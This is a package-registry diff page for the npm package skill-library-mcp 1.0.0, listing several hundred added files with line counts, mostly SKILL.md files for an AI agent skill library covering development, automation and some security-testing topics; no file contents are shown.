npm - skill-library-mcp - Versions diffs - 1.0.0 - Mend

skill-library-mcp 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (989) hide show

package/.claude/settings.local.json +10 -0
package/.github/workflows/ci.yml +85 -0
package/.github/workflows/release.yml +57 -0
package/.release-please-manifest.json +3 -0
package/CLAUDE.md +60 -0
package/LICENSE +21 -0
package/Makefile +18 -0
package/README.md +222 -0
package/dist/index.js +312 -0
package/docs/architecture.md +61 -0
package/docs/development.md +83 -0
package/package.json +29 -0
package/release-please-config.json +17 -0
package/scripts/import-skills.ts +103 -0
package/skills/3d-web-experience/SKILL.md +254 -0
package/skills/ab-test-setup/SKILL.md +232 -0
package/skills/accessibility-compliance-accessibility-audit/SKILL.md +42 -0
package/skills/accessibility-compliance-accessibility-audit/resources/implementation-playbook.md +502 -0
package/skills/active-directory-attacks/SKILL.md +383 -0
package/skills/activecampaign-automation/SKILL.md +209 -0
package/skills/address-github-comments/SKILL.md +55 -0
package/skills/agent-evaluation/SKILL.md +64 -0
package/skills/agent-manager-skill/SKILL.md +40 -0
package/skills/agent-memory-mcp/SKILL.md +82 -0
package/skills/agent-memory-systems/SKILL.md +67 -0
package/skills/agent-orchestration-improve-agent/SKILL.md +349 -0
package/skills/agent-orchestration-multi-agent-optimize/SKILL.md +239 -0
package/skills/agent-tool-builder/SKILL.md +53 -0
package/skills/ai-agents-architect/SKILL.md +90 -0
package/skills/ai-engineer/SKILL.md +171 -0
package/skills/ai-product/SKILL.md +54 -0
package/skills/ai-wrapper-product/SKILL.md +273 -0
package/skills/airflow-dag-patterns/SKILL.md +41 -0
package/skills/airflow-dag-patterns/resources/implementation-playbook.md +509 -0
package/skills/airtable-automation/SKILL.md +170 -0
package/skills/algolia-search/SKILL.md +66 -0
package/skills/algorithmic-art/LICENSE.txt +202 -0
package/skills/algorithmic-art/SKILL.md +405 -0
package/skills/algorithmic-art/templates/generator_template.js +223 -0
package/skills/algorithmic-art/templates/viewer.html +599 -0
package/skills/amplitude-automation/SKILL.md +216 -0
package/skills/analytics-tracking/SKILL.md +404 -0
package/skills/angular/SKILL.md +821 -0
package/skills/angular-best-practices/SKILL.md +559 -0
package/skills/angular-migration/SKILL.md +428 -0
package/skills/angular-state-management/SKILL.md +634 -0
package/skills/angular-ui-patterns/SKILL.md +508 -0
package/skills/anti-reversing-techniques/SKILL.md +42 -0
package/skills/anti-reversing-techniques/resources/implementation-playbook.md +539 -0
package/skills/antigravity-workflows/SKILL.md +80 -0
package/skills/antigravity-workflows/resources/implementation-playbook.md +36 -0
package/skills/api-design-principles/SKILL.md +37 -0
package/skills/api-design-principles/resources/implementation-playbook.md +513 -0
package/skills/api-documentation-generator/SKILL.md +484 -0
package/skills/api-documenter/SKILL.md +184 -0
package/skills/api-fuzzing-bug-bounty/SKILL.md +433 -0
package/skills/api-patterns/SKILL.md +81 -0
package/skills/api-security-best-practices/SKILL.md +907 -0
package/skills/api-testing-observability-api-mock/SKILL.md +46 -0
package/skills/api-testing-observability-api-mock/resources/implementation-playbook.md +1327 -0
package/skills/app-builder/SKILL.md +75 -0
package/skills/app-store-optimization/SKILL.md +403 -0
package/skills/application-performance-performance-optimization/SKILL.md +154 -0
package/skills/architect-review/SKILL.md +174 -0
package/skills/architecture/SKILL.md +55 -0
package/skills/architecture-decision-records/SKILL.md +441 -0
package/skills/architecture-patterns/SKILL.md +37 -0
package/skills/architecture-patterns/resources/implementation-playbook.md +479 -0
package/skills/arm-cortex-expert/SKILL.md +306 -0
package/skills/asana-automation/SKILL.md +171 -0
package/skills/async-python-patterns/SKILL.md +39 -0
package/skills/async-python-patterns/resources/implementation-playbook.md +678 -0
package/skills/attack-tree-construction/SKILL.md +38 -0
package/skills/attack-tree-construction/resources/implementation-playbook.md +671 -0
package/skills/audio-transcriber/SKILL.md +558 -0
package/skills/auth-implementation-patterns/SKILL.md +39 -0
package/skills/auth-implementation-patterns/resources/implementation-playbook.md +618 -0
package/skills/automate-whatsapp/SKILL.md +257 -0
package/skills/autonomous-agent-patterns/SKILL.md +761 -0
package/skills/autonomous-agents/SKILL.md +68 -0
package/skills/avalonia-layout-zafiro/SKILL.md +59 -0
package/skills/avalonia-viewmodels-zafiro/SKILL.md +29 -0
package/skills/avalonia-zafiro-development/SKILL.md +29 -0
package/skills/aws-penetration-testing/SKILL.md +405 -0
package/skills/aws-serverless/SKILL.md +323 -0
package/skills/aws-skills/SKILL.md +22 -0
package/skills/azure-functions/SKILL.md +42 -0
package/skills/backend-architect/SKILL.md +333 -0
package/skills/backend-dev-guidelines/SKILL.md +342 -0
package/skills/backend-dev-guidelines/resources/architecture-overview.md +451 -0
package/skills/backend-dev-guidelines/resources/async-and-errors.md +307 -0
package/skills/backend-dev-guidelines/resources/complete-examples.md +638 -0
package/skills/backend-dev-guidelines/resources/configuration.md +275 -0
package/skills/backend-dev-guidelines/resources/database-patterns.md +224 -0
package/skills/backend-dev-guidelines/resources/middleware-guide.md +213 -0
package/skills/backend-dev-guidelines/resources/routing-and-controllers.md +756 -0
package/skills/backend-dev-guidelines/resources/sentry-and-monitoring.md +336 -0
package/skills/backend-dev-guidelines/resources/services-and-repositories.md +789 -0
package/skills/backend-dev-guidelines/resources/testing-guide.md +235 -0
package/skills/backend-dev-guidelines/resources/validation-patterns.md +754 -0
package/skills/backend-development-feature-development/SKILL.md +180 -0
package/skills/backend-security-coder/SKILL.md +156 -0
package/skills/backtesting-frameworks/SKILL.md +39 -0
package/skills/backtesting-frameworks/resources/implementation-playbook.md +647 -0
package/skills/bamboohr-automation/SKILL.md +220 -0
package/skills/basecamp-automation/SKILL.md +234 -0
package/skills/bash-defensive-patterns/SKILL.md +43 -0
package/skills/bash-defensive-patterns/resources/implementation-playbook.md +517 -0
package/skills/bash-linux/SKILL.md +199 -0
package/skills/bash-pro/SKILL.md +310 -0
package/skills/bats-testing-patterns/SKILL.md +34 -0
package/skills/bats-testing-patterns/resources/implementation-playbook.md +614 -0
package/skills/bazel-build-optimization/SKILL.md +397 -0
package/skills/beautiful-prose/SKILL.md +22 -0
package/skills/behavioral-modes/SKILL.md +242 -0
package/skills/billing-automation/SKILL.md +42 -0
package/skills/billing-automation/resources/implementation-playbook.md +544 -0
package/skills/binary-analysis-patterns/SKILL.md +450 -0
package/skills/bitbucket-automation/SKILL.md +224 -0
package/skills/blockchain-developer/SKILL.md +208 -0
package/skills/blockrun/SKILL.md +292 -0
package/skills/box-automation/SKILL.md +233 -0
package/skills/brainstorming/SKILL.md +230 -0
package/skills/brand-guidelines-anthropic/SKILL.md +73 -0
package/skills/brevo-automation/SKILL.md +197 -0
package/skills/broken-authentication/SKILL.md +476 -0
package/skills/browser-automation/SKILL.md +70 -0
package/skills/browser-extension-builder/SKILL.md +261 -0
package/skills/bullmq-specialist/SKILL.md +57 -0
package/skills/bun-development/SKILL.md +691 -0
package/skills/burp-suite-testing/SKILL.md +380 -0
package/skills/business-analyst/SKILL.md +182 -0
package/skills/busybox-on-windows/SKILL.md +30 -0
package/skills/c-pro/SKILL.md +56 -0
package/skills/c4-architecture-c4-architecture/SKILL.md +389 -0
package/skills/c4-code/SKILL.md +244 -0
package/skills/c4-component/SKILL.md +153 -0
package/skills/c4-container/SKILL.md +171 -0
package/skills/c4-context/SKILL.md +150 -0
package/skills/cal-com-automation/SKILL.md +203 -0
package/skills/calendly-automation/SKILL.md +211 -0
package/skills/canva-automation/SKILL.md +217 -0
package/skills/canvas-design/LICENSE.txt +202 -0
package/skills/canvas-design/SKILL.md +130 -0
package/skills/canvas-design/canvas-fonts/ArsenalSC-OFL.txt +93 -0
package/skills/canvas-design/canvas-fonts/ArsenalSC-Regular.ttf +0 -0
package/skills/canvas-design/canvas-fonts/BigShoulders-Bold.ttf +0 -0
package/skills/canvas-design/canvas-fonts/BigShoulders-OFL.txt +93 -0
package/skills/canvas-design/canvas-fonts/BigShoulders-Regular.ttf +0 -0
package/skills/canvas-design/canvas-fonts/Boldonse-OFL.txt +93 -0
package/skills/canvas-design/canvas-fonts/Boldonse-Regular.ttf +0 -0
package/skills/canvas-design/canvas-fonts/BricolageGrotesque-Bold.ttf +0 -0
package/skills/canvas-design/canvas-fonts/BricolageGrotesque-OFL.txt +93 -0
package/skills/canvas-design/canvas-fonts/BricolageGrotesque-Regular.ttf +0 -0
package/skills/canvas-design/canvas-fonts/CrimsonPro-Bold.ttf +0 -0
package/skills/canvas-design/canvas-fonts/CrimsonPro-Italic.ttf +0 -0
package/skills/canvas-design/canvas-fonts/CrimsonPro-OFL.txt +93 -0
package/skills/canvas-design/canvas-fonts/CrimsonPro-Regular.ttf +0 -0
package/skills/canvas-design/canvas-fonts/DMMono-OFL.txt +93 -0
package/skills/canvas-design/canvas-fonts/DMMono-Regular.ttf +0 -0
package/skills/canvas-design/canvas-fonts/EricaOne-OFL.txt +94 -0
package/skills/canvas-design/canvas-fonts/EricaOne-Regular.ttf +0 -0
package/skills/canvas-design/canvas-fonts/GeistMono-Bold.ttf +0 -0
package/skills/canvas-design/canvas-fonts/GeistMono-OFL.txt +93 -0
package/skills/canvas-design/canvas-fonts/GeistMono-Regular.ttf +0 -0
package/skills/canvas-design/canvas-fonts/Gloock-OFL.txt +93 -0
package/skills/canvas-design/canvas-fonts/Gloock-Regular.ttf +0 -0
package/skills/canvas-design/canvas-fonts/IBMPlexMono-Bold.ttf +0 -0
package/skills/canvas-design/canvas-fonts/IBMPlexMono-OFL.txt +93 -0
package/skills/canvas-design/canvas-fonts/IBMPlexMono-Regular.ttf +0 -0
package/skills/canvas-design/canvas-fonts/IBMPlexSerif-Bold.ttf +0 -0
package/skills/canvas-design/canvas-fonts/IBMPlexSerif-BoldItalic.ttf +0 -0
package/skills/canvas-design/canvas-fonts/IBMPlexSerif-Italic.ttf +0 -0
package/skills/canvas-design/canvas-fonts/IBMPlexSerif-Regular.ttf +0 -0
package/skills/canvas-design/canvas-fonts/InstrumentSans-Bold.ttf +0 -0
package/skills/canvas-design/canvas-fonts/InstrumentSans-BoldItalic.ttf +0 -0
package/skills/canvas-design/canvas-fonts/InstrumentSans-Italic.ttf +0 -0
package/skills/canvas-design/canvas-fonts/InstrumentSans-OFL.txt +93 -0
package/skills/canvas-design/canvas-fonts/InstrumentSans-Regular.ttf +0 -0
package/skills/canvas-design/canvas-fonts/InstrumentSerif-Italic.ttf +0 -0
package/skills/canvas-design/canvas-fonts/InstrumentSerif-Regular.ttf +0 -0
package/skills/canvas-design/canvas-fonts/Italiana-OFL.txt +93 -0
package/skills/canvas-design/canvas-fonts/Italiana-Regular.ttf +0 -0
package/skills/canvas-design/canvas-fonts/JetBrainsMono-Bold.ttf +0 -0
package/skills/canvas-design/canvas-fonts/JetBrainsMono-OFL.txt +93 -0
package/skills/canvas-design/canvas-fonts/JetBrainsMono-Regular.ttf +0 -0
package/skills/canvas-design/canvas-fonts/Jura-Light.ttf +0 -0
package/skills/canvas-design/canvas-fonts/Jura-Medium.ttf +0 -0
package/skills/canvas-design/canvas-fonts/Jura-OFL.txt +93 -0
package/skills/canvas-design/canvas-fonts/LibreBaskerville-OFL.txt +93 -0
package/skills/canvas-design/canvas-fonts/LibreBaskerville-Regular.ttf +0 -0
package/skills/canvas-design/canvas-fonts/Lora-Bold.ttf +0 -0
package/skills/canvas-design/canvas-fonts/Lora-BoldItalic.ttf +0 -0
package/skills/canvas-design/canvas-fonts/Lora-Italic.ttf +0 -0
package/skills/canvas-design/canvas-fonts/Lora-OFL.txt +93 -0
package/skills/canvas-design/canvas-fonts/Lora-Regular.ttf +0 -0
package/skills/canvas-design/canvas-fonts/NationalPark-Bold.ttf +0 -0
package/skills/canvas-design/canvas-fonts/NationalPark-OFL.txt +93 -0
package/skills/canvas-design/canvas-fonts/NationalPark-Regular.ttf +0 -0
package/skills/canvas-design/canvas-fonts/NothingYouCouldDo-OFL.txt +93 -0
package/skills/canvas-design/canvas-fonts/NothingYouCouldDo-Regular.ttf +0 -0
package/skills/canvas-design/canvas-fonts/Outfit-Bold.ttf +0 -0
package/skills/canvas-design/canvas-fonts/Outfit-OFL.txt +93 -0
package/skills/canvas-design/canvas-fonts/Outfit-Regular.ttf +0 -0
package/skills/canvas-design/canvas-fonts/PixelifySans-Medium.ttf +0 -0
package/skills/canvas-design/canvas-fonts/PixelifySans-OFL.txt +93 -0
package/skills/canvas-design/canvas-fonts/PoiretOne-OFL.txt +93 -0
package/skills/canvas-design/canvas-fonts/PoiretOne-Regular.ttf +0 -0
package/skills/canvas-design/canvas-fonts/RedHatMono-Bold.ttf +0 -0
package/skills/canvas-design/canvas-fonts/RedHatMono-OFL.txt +93 -0
package/skills/canvas-design/canvas-fonts/RedHatMono-Regular.ttf +0 -0
package/skills/canvas-design/canvas-fonts/Silkscreen-OFL.txt +93 -0
package/skills/canvas-design/canvas-fonts/Silkscreen-Regular.ttf +0 -0
package/skills/canvas-design/canvas-fonts/SmoochSans-Medium.ttf +0 -0
package/skills/canvas-design/canvas-fonts/SmoochSans-OFL.txt +93 -0
package/skills/canvas-design/canvas-fonts/Tektur-Medium.ttf +0 -0
package/skills/canvas-design/canvas-fonts/Tektur-OFL.txt +93 -0
package/skills/canvas-design/canvas-fonts/Tektur-Regular.ttf +0 -0
package/skills/canvas-design/canvas-fonts/WorkSans-Bold.ttf +0 -0
package/skills/canvas-design/canvas-fonts/WorkSans-BoldItalic.ttf +0 -0
package/skills/canvas-design/canvas-fonts/WorkSans-Italic.ttf +0 -0
package/skills/canvas-design/canvas-fonts/WorkSans-OFL.txt +93 -0
package/skills/canvas-design/canvas-fonts/WorkSans-Regular.ttf +0 -0
package/skills/canvas-design/canvas-fonts/YoungSerif-OFL.txt +93 -0
package/skills/canvas-design/canvas-fonts/YoungSerif-Regular.ttf +0 -0
package/skills/cc-skill-backend-patterns/SKILL.md +584 -0
package/skills/cc-skill-clickhouse-io/SKILL.md +431 -0
package/skills/cc-skill-coding-standards/SKILL.md +522 -0
package/skills/cc-skill-continuous-learning/SKILL.md +10 -0
package/skills/cc-skill-frontend-patterns/SKILL.md +633 -0
package/skills/cc-skill-project-guidelines-example/SKILL.md +352 -0
package/skills/cc-skill-security-review/SKILL.md +496 -0
package/skills/cc-skill-strategic-compact/SKILL.md +10 -0
package/skills/changelog-automation/SKILL.md +38 -0
package/skills/changelog-automation/resources/implementation-playbook.md +538 -0
package/skills/cicd-automation-workflow-automate/SKILL.md +51 -0
package/skills/cicd-automation-workflow-automate/resources/implementation-playbook.md +1333 -0
package/skills/circleci-automation/SKILL.md +177 -0
package/skills/clarity-gate/SKILL.md +22 -0
package/skills/claude-ally-health/SKILL.md +22 -0
package/skills/claude-code-guide/SKILL.md +68 -0
package/skills/claude-d3js-skill/SKILL.md +820 -0
package/skills/claude-scientific-skills/SKILL.md +22 -0
package/skills/claude-speed-reader/SKILL.md +22 -0
package/skills/claude-win11-speckit-update-skill/SKILL.md +22 -0
package/skills/clean-code/SKILL.md +94 -0
package/skills/clerk-auth/SKILL.md +56 -0
package/skills/clickup-automation/SKILL.md +234 -0
package/skills/close-automation/SKILL.md +212 -0
package/skills/cloud-architect/SKILL.md +135 -0
package/skills/cloud-penetration-testing/SKILL.md +501 -0
package/skills/coda-automation/SKILL.md +241 -0
package/skills/code-documentation-code-explain/SKILL.md +46 -0
package/skills/code-documentation-code-explain/resources/implementation-playbook.md +802 -0
package/skills/code-documentation-doc-generate/SKILL.md +48 -0
package/skills/code-documentation-doc-generate/resources/implementation-playbook.md +640 -0
package/skills/code-refactoring-context-restore/SKILL.md +179 -0
package/skills/code-refactoring-refactor-clean/SKILL.md +51 -0
package/skills/code-refactoring-refactor-clean/resources/implementation-playbook.md +879 -0
package/skills/code-refactoring-tech-debt/SKILL.md +386 -0
package/skills/code-review-ai-ai-review/SKILL.md +450 -0
package/skills/code-review-checklist/SKILL.md +444 -0
package/skills/code-review-excellence/SKILL.md +40 -0
package/skills/code-review-excellence/resources/implementation-playbook.md +515 -0
package/skills/code-reviewer/SKILL.md +178 -0
package/skills/codebase-cleanup-deps-audit/SKILL.md +51 -0
package/skills/codebase-cleanup-deps-audit/resources/implementation-playbook.md +766 -0
package/skills/codebase-cleanup-refactor-clean/SKILL.md +51 -0
package/skills/codebase-cleanup-refactor-clean/resources/implementation-playbook.md +879 -0
package/skills/codebase-cleanup-tech-debt/SKILL.md +386 -0
package/skills/codex-review/SKILL.md +37 -0
package/skills/commit/SKILL.md +171 -0
package/skills/competitive-landscape/SKILL.md +34 -0
package/skills/competitive-landscape/resources/implementation-playbook.md +494 -0
package/skills/competitor-alternatives/SKILL.md +750 -0
package/skills/comprehensive-review-full-review/SKILL.md +146 -0
package/skills/comprehensive-review-pr-enhance/SKILL.md +46 -0
package/skills/comprehensive-review-pr-enhance/resources/implementation-playbook.md +691 -0
package/skills/computer-use-agents/SKILL.md +315 -0
package/skills/computer-vision-expert/SKILL.md +70 -0
package/skills/concise-planning/SKILL.md +62 -0
package/skills/conductor-implement/SKILL.md +388 -0
package/skills/conductor-manage/SKILL.md +39 -0
package/skills/conductor-manage/resources/implementation-playbook.md +1120 -0
package/skills/conductor-new-track/SKILL.md +433 -0
package/skills/conductor-revert/SKILL.md +372 -0
package/skills/conductor-setup/SKILL.md +426 -0
package/skills/conductor-status/SKILL.md +338 -0
package/skills/conductor-validator/SKILL.md +62 -0
package/skills/confluence-automation/SKILL.md +208 -0
package/skills/content-creator/SKILL.md +248 -0
package/skills/content-marketer/SKILL.md +170 -0
package/skills/context-compression/SKILL.md +266 -0
package/skills/context-degradation/SKILL.md +238 -0
package/skills/context-driven-development/SKILL.md +400 -0
package/skills/context-fundamentals/SKILL.md +192 -0
package/skills/context-management-context-restore/SKILL.md +179 -0
package/skills/context-management-context-save/SKILL.md +177 -0
package/skills/context-manager/SKILL.md +185 -0
package/skills/context-optimization/SKILL.md +186 -0
package/skills/context-window-management/SKILL.md +53 -0
package/skills/context7-auto-research/SKILL.md +36 -0
package/skills/conversation-memory/SKILL.md +61 -0
package/skills/convertkit-automation/SKILL.md +195 -0
package/skills/copy-editing/SKILL.md +439 -0
package/skills/copywriting/SKILL.md +225 -0
package/skills/core-components/SKILL.md +264 -0
package/skills/cost-optimization/SKILL.md +286 -0
package/skills/cpp-pro/SKILL.md +59 -0
package/skills/cqrs-implementation/SKILL.md +35 -0
package/skills/cqrs-implementation/resources/implementation-playbook.md +540 -0
package/skills/create-pr/SKILL.md +192 -0
package/skills/crewai/SKILL.md +243 -0
package/skills/csharp-pro/SKILL.md +59 -0
package/skills/culture-index/SKILL.md +43 -0
package/skills/customer-support/SKILL.md +170 -0
package/skills/daily-news-report/SKILL.md +356 -0
package/skills/data-engineer/SKILL.md +224 -0
package/skills/data-engineering-data-driven-feature/SKILL.md +182 -0
package/skills/data-engineering-data-pipeline/SKILL.md +201 -0
package/skills/data-quality-frameworks/SKILL.md +40 -0
package/skills/data-quality-frameworks/resources/implementation-playbook.md +573 -0
package/skills/data-scientist/SKILL.md +199 -0
package/skills/data-storytelling/SKILL.md +465 -0
package/skills/database-admin/SKILL.md +165 -0
package/skills/database-architect/SKILL.md +268 -0
package/skills/database-cloud-optimization-cost-optimize/SKILL.md +44 -0
package/skills/database-cloud-optimization-cost-optimize/resources/implementation-playbook.md +1441 -0
package/skills/database-design/SKILL.md +52 -0
package/skills/database-migration/SKILL.md +436 -0
package/skills/database-migrations-migration-observability/SKILL.md +420 -0
package/skills/database-migrations-sql-migrations/SKILL.md +53 -0
package/skills/database-migrations-sql-migrations/resources/implementation-playbook.md +499 -0
package/skills/database-optimizer/SKILL.md +167 -0
package/skills/datadog-automation/SKILL.md +235 -0
package/skills/dbt-transformation-patterns/SKILL.md +34 -0
package/skills/dbt-transformation-patterns/resources/implementation-playbook.md +547 -0
package/skills/debugger/SKILL.md +49 -0
package/skills/debugging-strategies/SKILL.md +34 -0
package/skills/debugging-strategies/resources/implementation-playbook.md +511 -0
package/skills/debugging-toolkit-smart-debug/SKILL.md +197 -0
package/skills/deep-research/SKILL.md +114 -0
package/skills/defi-protocol-templates/SKILL.md +466 -0
package/skills/dependency-management-deps-audit/SKILL.md +44 -0
package/skills/dependency-management-deps-audit/resources/implementation-playbook.md +766 -0
package/skills/dependency-upgrade/SKILL.md +421 -0
package/skills/deployment-engineer/SKILL.md +170 -0
package/skills/deployment-pipeline-design/SKILL.md +371 -0
package/skills/deployment-procedures/SKILL.md +241 -0
package/skills/deployment-validation-config-validate/SKILL.md +496 -0
package/skills/design-md/SKILL.md +178 -0
package/skills/design-orchestration/SKILL.md +167 -0
package/skills/devops-troubleshooter/SKILL.md +161 -0
package/skills/discord-automation/SKILL.md +187 -0
package/skills/discord-bot-architect/SKILL.md +277 -0
package/skills/dispatching-parallel-agents/SKILL.md +180 -0
package/skills/distributed-debugging-debug-trace/SKILL.md +44 -0
package/skills/distributed-debugging-debug-trace/resources/implementation-playbook.md +1307 -0
package/skills/distributed-tracing/SKILL.md +450 -0
package/skills/django-pro/SKILL.md +180 -0
package/skills/doc-coauthoring/SKILL.md +375 -0
package/skills/docker-expert/SKILL.md +409 -0
package/skills/docs-architect/SKILL.md +98 -0
package/skills/documentation-generation-doc-generate/SKILL.md +48 -0
package/skills/documentation-generation-doc-generate/resources/implementation-playbook.md +640 -0
package/skills/documentation-templates/SKILL.md +194 -0
package/skills/docusign-automation/SKILL.md +208 -0
package/skills/dotnet-architect/SKILL.md +197 -0
package/skills/dotnet-backend/SKILL.md +266 -0
package/skills/dotnet-backend-patterns/SKILL.md +37 -0
package/skills/dotnet-backend-patterns/resources/implementation-playbook.md +799 -0
package/skills/dropbox-automation/SKILL.md +230 -0
package/skills/dx-optimizer/SKILL.md +83 -0
package/skills/e2e-testing-patterns/SKILL.md +41 -0
package/skills/e2e-testing-patterns/resources/implementation-playbook.md +531 -0
package/skills/elixir-pro/SKILL.md +59 -0
package/skills/email-sequence/SKILL.md +925 -0
package/skills/email-systems/SKILL.md +54 -0
package/skills/embedding-strategies/SKILL.md +491 -0
package/skills/employment-contract-templates/SKILL.md +39 -0
package/skills/employment-contract-templates/resources/implementation-playbook.md +493 -0
package/skills/environment-setup-guide/SKILL.md +479 -0
package/skills/error-debugging-error-analysis/SKILL.md +47 -0
package/skills/error-debugging-error-analysis/resources/implementation-playbook.md +1143 -0
package/skills/error-debugging-error-trace/SKILL.md +43 -0
package/skills/error-debugging-error-trace/resources/implementation-playbook.md +1361 -0
package/skills/error-debugging-multi-agent-review/SKILL.md +216 -0
package/skills/error-detective/SKILL.md +53 -0
package/skills/error-diagnostics-error-analysis/SKILL.md +47 -0
package/skills/error-diagnostics-error-analysis/resources/implementation-playbook.md +1143 -0
package/skills/error-diagnostics-error-trace/SKILL.md +48 -0
package/skills/error-diagnostics-error-trace/resources/implementation-playbook.md +1371 -0
package/skills/error-diagnostics-smart-debug/SKILL.md +197 -0
package/skills/error-handling-patterns/SKILL.md +35 -0
package/skills/error-handling-patterns/resources/implementation-playbook.md +635 -0
package/skills/ethical-hacking-methodology/SKILL.md +466 -0
package/skills/evaluation/SKILL.md +238 -0
package/skills/event-sourcing-architect/SKILL.md +58 -0
package/skills/event-store-design/SKILL.md +449 -0
package/skills/exa-search/SKILL.md +36 -0
package/skills/executing-plans/SKILL.md +76 -0
package/skills/expo-deployment/SKILL.md +72 -0
package/skills/fal-audio/SKILL.md +22 -0
package/skills/fal-generate/SKILL.md +22 -0
package/skills/fal-image-edit/SKILL.md +22 -0
package/skills/fal-platform/SKILL.md +22 -0
package/skills/fal-upscale/SKILL.md +22 -0
package/skills/fal-workflow/SKILL.md +22 -0
package/skills/fastapi-pro/SKILL.md +192 -0
package/skills/fastapi-templates/SKILL.md +32 -0
package/skills/fastapi-templates/resources/implementation-playbook.md +566 -0
package/skills/ffuf-claude-skill/SKILL.md +22 -0
package/skills/figma-automation/SKILL.md +181 -0
package/skills/file-organizer/SKILL.md +250 -0
package/skills/file-path-traversal/SKILL.md +486 -0
package/skills/file-uploads/SKILL.md +22 -0
package/skills/find-bugs/SKILL.md +86 -0
package/skills/finishing-a-development-branch/SKILL.md +200 -0
package/skills/firebase/SKILL.md +56 -0
package/skills/firecrawl-scraper/SKILL.md +37 -0
package/skills/firmware-analyst/SKILL.md +320 -0
package/skills/fix-review/SKILL.md +53 -0
package/skills/flutter-expert/SKILL.md +200 -0
package/skills/form-cro/SKILL.md +441 -0
package/skills/fp-ts-errors/SKILL.md +856 -0
package/skills/fp-ts-pragmatic/SKILL.md +598 -0
package/skills/fp-ts-react/SKILL.md +796 -0
package/skills/framework-migration-code-migrate/SKILL.md +48 -0
package/skills/framework-migration-code-migrate/resources/implementation-playbook.md +1052 -0
package/skills/framework-migration-deps-upgrade/SKILL.md +48 -0
package/skills/framework-migration-deps-upgrade/resources/implementation-playbook.md +755 -0
package/skills/framework-migration-legacy-modernize/SKILL.md +132 -0
package/skills/free-tool-strategy/SKILL.md +576 -0
package/skills/freshdesk-automation/SKILL.md +219 -0
package/skills/freshservice-automation/SKILL.md +213 -0
package/skills/frontend-design/LICENSE.txt +177 -0
package/skills/frontend-design/SKILL.md +42 -0
package/skills/frontend-dev-guidelines/SKILL.md +359 -0
package/skills/frontend-dev-guidelines/resources/common-patterns.md +331 -0
package/skills/frontend-dev-guidelines/resources/complete-examples.md +872 -0
package/skills/frontend-dev-guidelines/resources/component-patterns.md +502 -0
package/skills/frontend-dev-guidelines/resources/data-fetching.md +767 -0
package/skills/frontend-dev-guidelines/resources/file-organization.md +502 -0
package/skills/frontend-dev-guidelines/resources/loading-and-error-states.md +501 -0
package/skills/frontend-dev-guidelines/resources/performance.md +406 -0
package/skills/frontend-dev-guidelines/resources/routing-guide.md +364 -0
package/skills/frontend-dev-guidelines/resources/styling-guide.md +428 -0
package/skills/frontend-dev-guidelines/resources/typescript-standards.md +418 -0
package/skills/frontend-developer/SKILL.md +171 -0
package/skills/frontend-mobile-development-component-scaffold/SKILL.md +403 -0
package/skills/frontend-mobile-security-xss-scan/SKILL.md +322 -0
package/skills/frontend-security-coder/SKILL.md +170 -0
package/skills/frontend-slides/SKILL.md +770 -0
package/skills/full-stack-orchestration-full-stack-feature/SKILL.md +135 -0
package/skills/game-development/SKILL.md +167 -0
package/skills/gcp-cloud-run/SKILL.md +288 -0
package/skills/gdpr-data-handling/SKILL.md +33 -0
package/skills/gdpr-data-handling/resources/implementation-playbook.md +615 -0
package/skills/geo-fundamentals/SKILL.md +156 -0
package/skills/git-advanced-workflows/SKILL.md +412 -0
package/skills/git-pr-workflows-git-workflow/SKILL.md +140 -0
package/skills/git-pr-workflows-onboard/SKILL.md +416 -0
package/skills/git-pr-workflows-pr-enhance/SKILL.md +48 -0
package/skills/git-pr-workflows-pr-enhance/resources/implementation-playbook.md +701 -0
package/skills/git-pushing/SKILL.md +33 -0
package/skills/github-actions-templates/SKILL.md +345 -0
package/skills/github-automation/SKILL.md +227 -0
package/skills/github-workflow-automation/SKILL.md +846 -0
package/skills/gitlab-automation/SKILL.md +254 -0
package/skills/gitlab-ci-patterns/SKILL.md +283 -0
package/skills/gitops-workflow/SKILL.md +303 -0
package/skills/gmail-automation/SKILL.md +270 -0
package/skills/go-concurrency-patterns/SKILL.md +33 -0
package/skills/go-concurrency-patterns/resources/implementation-playbook.md +654 -0
package/skills/go-playwright/SKILL.md +76 -0
package/skills/go-playwright/resources/implementation-playbook.md +110 -0
package/skills/godot-gdscript-patterns/SKILL.md +33 -0
package/skills/godot-gdscript-patterns/resources/implementation-playbook.md +804 -0
package/skills/golang-pro/SKILL.md +179 -0
package/skills/google-analytics-automation/SKILL.md +227 -0
package/skills/google-calendar-automation/SKILL.md +176 -0
package/skills/google-drive-automation/SKILL.md +193 -0
package/skills/googlesheets-automation/SKILL.md +197 -0
package/skills/grafana-dashboards/SKILL.md +381 -0
package/skills/graphql/SKILL.md +68 -0
package/skills/graphql-architect/SKILL.md +182 -0
package/skills/haskell-pro/SKILL.md +56 -0
package/skills/helm-chart-scaffolding/SKILL.md +34 -0
package/skills/helm-chart-scaffolding/resources/implementation-playbook.md +543 -0
package/skills/helpdesk-automation/SKILL.md +166 -0
package/skills/hr-pro/SKILL.md +126 -0
package/skills/html-injection-testing/SKILL.md +498 -0
package/skills/hubspot-automation/SKILL.md +178 -0
package/skills/hubspot-integration/SKILL.md +42 -0
package/skills/hugging-face-cli/SKILL.md +198 -0
package/skills/hugging-face-jobs/SKILL.md +1038 -0
package/skills/hybrid-cloud-architect/SKILL.md +168 -0
package/skills/hybrid-cloud-networking/SKILL.md +238 -0
package/skills/hybrid-search-implementation/SKILL.md +32 -0
package/skills/hybrid-search-implementation/resources/implementation-playbook.md +567 -0
package/skills/i18n-localization/SKILL.md +154 -0
package/skills/idor-testing/SKILL.md +442 -0
package/skills/imagen/SKILL.md +77 -0
package/skills/incident-responder/SKILL.md +213 -0
package/skills/incident-response-incident-response/SKILL.md +168 -0
package/skills/incident-response-smart-fix/SKILL.md +29 -0
package/skills/incident-response-smart-fix/resources/implementation-playbook.md +838 -0
package/skills/incident-runbook-templates/SKILL.md +395 -0
package/skills/infinite-gratitude/SKILL.md +26 -0
package/skills/inngest/SKILL.md +55 -0
package/skills/instagram-automation/SKILL.md +192 -0
package/skills/interactive-portfolio/SKILL.md +223 -0
package/skills/intercom-automation/SKILL.md +248 -0
package/skills/internal-comms-anthropic/SKILL.md +32 -0
package/skills/ios-developer/SKILL.md +219 -0
package/skills/istio-traffic-management/SKILL.md +337 -0
package/skills/iterate-pr/SKILL.md +150 -0
package/skills/java-pro/SKILL.md +177 -0
package/skills/javascript-mastery/SKILL.md +645 -0
package/skills/javascript-pro/SKILL.md +57 -0
